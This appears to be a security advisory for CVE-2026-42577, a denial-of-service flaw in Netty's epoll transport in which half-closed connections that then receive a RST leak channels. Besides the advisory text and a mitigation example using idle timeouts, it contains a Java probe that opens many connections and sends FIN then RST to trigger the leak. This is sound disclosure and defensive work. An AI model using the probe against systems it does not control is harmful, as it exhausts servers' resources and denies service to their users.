PT-2026-38280 · Netty · Netty

Published: 2026-05-06 · Updated: 2026-05-18 · CVE-2026-42577

CVSS v3.1: 7.5 (High)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Name of the Vulnerable Software and Affected Versions: Netty versions 4.2.0.Final through 4.2.12.Final
Description: Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed. The condition arises when a connection has ChannelOption.ALLOW_HALF_CLOSURE enabled, or has been put into a half-closed state by the HTTP codec, and the remote peer sends a FIN followed by a RST. After the FIN, the channel's input is marked as shut down; epollInReady() then short-circuits on that flag, and epollOutReady() is a no-op because there is no pending flush, so the EPOLLERR/EPOLLHUP condition raised by the RST is never processed and channelInactive is never fired. The result is stale channels that accumulate until file descriptors, memory, or connection-count limits are exhausted. In the code paths where clearEpollIn0() is not called when the ChannelInputShutdownReadComplete event is fired, the unconsumed readiness also drives the event loop thread into a 100% CPU busy loop, starving every other connection multiplexed on that loop.
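The peer behaviour the description depends on, a FIN followed by a RST, can be produced with plain JDK sockets. The probe below is an added example, not part of this advisory or of Netty; it assumes a test server you control (defaults to 127.0.0.1:8080, override on the command line) and a Linux host, where SO_LINGER with a zero timeout makes close() send a RST. Run it, then compare the server's open connections before and after, for example with `ss -tan state established` on the server host: on an affected version the channels opened by the probe stay established on the Netty side.

```java
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

/**
 * Added example (not part of the advisory or of Netty). Opens N connections to a
 * server, half-closes each one (FIN) and then aborts it (RST), the packet
 * sequence the advisory describes.
 */
public final class HalfCloseThenRstProbe {

    /** Defaults are assumptions for a local test server; override on the command line. */
    public static void main(String[] args) throws InterruptedException {
        String host = args.length > 0 ? args[0] : "127.0.0.1";
        int port = args.length > 1 ? Integer.parseInt(args[1]) : 8080;
        int connections = args.length > 2 ? Integer.parseInt(args[2]) : 100;

        int sent = 0;
        for (int i = 0; i < connections; i++) {
            if (halfCloseThenReset(host, port)) {
                sent++;
            }
        }
        System.out.println("FIN+RST sent on " + sent + " of " + connections + " connections");
    }

    /**
     * Returns true if the FIN/RST sequence was delivered, false if the
     * connection could not be established or was torn down early by the server.
     */
    static boolean halfCloseThenReset(String host, int port) throws InterruptedException {
        try (Socket s = new Socket()) {
            s.connect(new InetSocketAddress(host, port), 2000);
            // A small payload so the server is mid-conversation when the FIN arrives;
            // with ALLOW_HALF_CLOSURE the FIN surfaces on the Netty side as ChannelInputShutdownEvent.
            s.getOutputStream().write("ping\n".getBytes(StandardCharsets.US_ASCII));
            s.getOutputStream().flush();
            // shutdownOutput() sends the FIN but keeps the socket open for reading.
            s.shutdownOutput();
            Thread.sleep(50);   // let the server process the FIN before the RST lands
            // SO_LINGER with a zero timeout turns the upcoming close() into an abortive
            // close: the kernel discards unsent data and sends a RST instead of a FIN.
            s.setSoLinger(true, 0);
            // try-with-resources calls close() on the way out, which emits the RST.
            return true;
        } catch (IOException e) {
            System.err.println("connection failed: " + e.getMessage());
            return false;
        }
    }
}
```

If the server has ALLOW_HALF_CLOSURE disabled, Netty closes the channel as soon as the FIN is read, so the probe will show no leak there; the condition requires half-closure to be in effect, as the description states.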
Recommendations: Update to version 4.2.13.Final. Until the update is applied, configure idle timeouts on connections to limit the lifetime of stale channels; this bounds resource exhaustion from leaked channels but does not prevent the condition itself, so it is a mitigation, not a fix.
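The following is an added example of the recommended mitigation, not code from this advisory or from the Netty project: an epoll echo server that keeps half-closure enabled but (a) closes the channel itself once the peer's FIN arrives, instead of waiting for an EPOLLERR/EPOLLHUP that may never be processed, and (b) caps the lifetime of any silent channel with IdleStateHandler. It assumes the Netty 4.2 API (MultiThreadIoEventLoopGroup with EpollIoHandler) and the timeout values marked as assumptions in the code.

```java
import io.netty.bootstrap.ServerBootstrap;
import io.netty.buffer.Unpooled;
import io.netty.channel.Channel;
import io.netty.channel.ChannelFutureListener;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelOption;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.MultiThreadIoEventLoopGroup;
import io.netty.channel.epoll.EpollIoHandler;
import io.netty.channel.epoll.EpollServerSocketChannel;
import io.netty.channel.socket.ChannelInputShutdownEvent;
import io.netty.handler.timeout.IdleStateEvent;
import io.netty.handler.timeout.IdleStateHandler;
import java.util.concurrent.TimeUnit;

/**
 * Added example (not code from the advisory or from Netty): an epoll echo server
 * that keeps ALLOW_HALF_CLOSURE on but never relies on EPOLLERR/EPOLLHUP to notice
 * a peer that went away after half-closing. Timeouts are assumptions for illustration.
 */
public final class HalfCloseBoundedServer {

    static final int ALL_IDLE_SECONDS = 30;   // assumption: upper bound on the life of any silent channel
    static final int DRAIN_SECONDS = 5;       // assumption: time allowed to finish writing after the peer's FIN

    public static void main(String[] args) throws InterruptedException {
        int port = args.length > 0 ? Integer.parseInt(args[0]) : 8080;
        // Netty 4.2 API: IoHandler factories replace the deprecated EpollEventLoopGroup.
        EventLoopGroup boss = new MultiThreadIoEventLoopGroup(1, EpollIoHandler.newFactory());
        EventLoopGroup workers = new MultiThreadIoEventLoopGroup(EpollIoHandler.newFactory());
        try {
            Channel server = new ServerBootstrap()
                    .group(boss, workers)
                    .channel(EpollServerSocketChannel.class)
                    .childOption(ChannelOption.ALLOW_HALF_CLOSURE, true)
                    .childHandler(new ChannelInitializer<Channel>() {
                        @Override
                        protected void initChannel(Channel ch) {
                            ch.pipeline().addLast(
                                    // readerIdle=0 and writerIdle=0 disable those timers; only all-idle fires.
                                    new IdleStateHandler(0, 0, ALL_IDLE_SECONDS, TimeUnit.SECONDS),
                                    new HalfCloseHandler());
                        }
                    })
                    .bind(port).sync().channel();
            server.closeFuture().sync();
        } finally {
            boss.shutdownGracefully();
            workers.shutdownGracefully();
        }
    }

    static final class HalfCloseHandler extends ChannelInboundHandlerAdapter {
        @Override
        public void channelRead(ChannelHandlerContext ctx, Object msg) {
            ctx.writeAndFlush(msg);   // echo; the write takes ownership of the ByteBuf
        }

        @Override
        public void userEventTriggered(ChannelHandlerContext ctx, Object evt) {
            if (evt instanceof ChannelInputShutdownEvent) {
                // Peer sent FIN. Flush what we still owe, then close. CLOSE runs whether the
                // flush succeeded or failed, so a RST following the FIN fails the write and
                // still ends in close() rather than in a channel waiting for an epoll event.
                ctx.writeAndFlush(Unpooled.EMPTY_BUFFER).addListener(ChannelFutureListener.CLOSE);
                // Hard deadline in case nothing ever completes the flush.
                ctx.executor().schedule(() -> { ctx.close(); }, DRAIN_SECONDS, TimeUnit.SECONDS);
            } else if (evt instanceof IdleStateEvent) {
                // Nothing read or written for ALL_IDLE_SECONDS: treat the channel as stale.
                ctx.close();
            } else {
                ctx.fireUserEventTriggered(evt);
            }
        }

        @Override
        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
            ctx.close();   // a failed write after the peer's RST lands here and releases the channel
        }
    }
}
```

Both close() paths work without an epoll readiness event, which is why they still release the channel on an affected version; the all-idle timer also runs inside the event loop, so it keeps firing even while that loop is spinning at 100% CPU. Neither replaces the upgrade to 4.2.13.Final: a peer that keeps sending FIN+RST still ties up a descriptor for up to ALL_IDLE_SECONDS each time.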

Fix: available in Netty 4.2.13.Final

Weakness Enumeration: Missing Release of Resource after Effective Lifetime (CWE-772)

Related Identifiers

CLEANSTART-2026-AO61361
CLEANSTART-2026-GX01236
CLEANSTART-2026-JW30455
CLEANSTART-2026-KV09488
CLEANSTART-2026-LE11246
CLEANSTART-2026-PO27799
CLEANSTART-2026-RD06185
CLEANSTART-2026-VJ37814
CLEANSTART-2026-WG59699
CVE-2026-42577
GHSA-RWM7-X88C-3G2P

Affected Products

Netty